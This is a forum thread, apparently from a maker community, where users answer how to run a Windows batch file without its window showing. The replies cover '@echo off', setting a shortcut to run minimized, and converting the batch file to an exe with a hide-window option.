what code in batch makes the batch file run witut showing itself?

If by this you mean start it hidden so that you can't tell it's running, then look here and here. I'll be making an Instructable based on the second theory to get it out there.

@echo off
Note that "echo off" is the actual command. The @ at the front means "run this one command without echoing it" -- and is needed to keep the "echo off" command from being echoed before it takes effect.

"Quick, Robin -- to the Bat Manual!"
@ECHO OFF tells the comp not to show the word ECHO before whatever is written after it. and of course that can be changed to @ECHO ON to show the ECHO CMDS. like say this
ECHO welcome home __________
that CMD will only show the welcome home ________ part of that NOT THE ECHO CMD
@ECHO ON will show the word echo before it it would look like
ECHO welcome home __________ in the batch the previous one would look like
welcome home __________
plz try to get the facts more straight

Oh, you want to hide the _window_? That's a different matter. Assuming you're on Windows, open the Properties of the Shortcut you've created. On the Shortcut tab, where it says "Run: Normal window", change that to "Run: Minimized". Hit OK.

To do what you want you need to convert to an exe with something like : <a href="http://www.f2ko.de/English/b2e/download.php">www.f2ko.de/English/b2e/download.php</a><br /> then in options put it to hide cmd window.<br />
Ork - I swear your answer wasn't up when I posted mine.
Great minds synch alike. Or something like that.
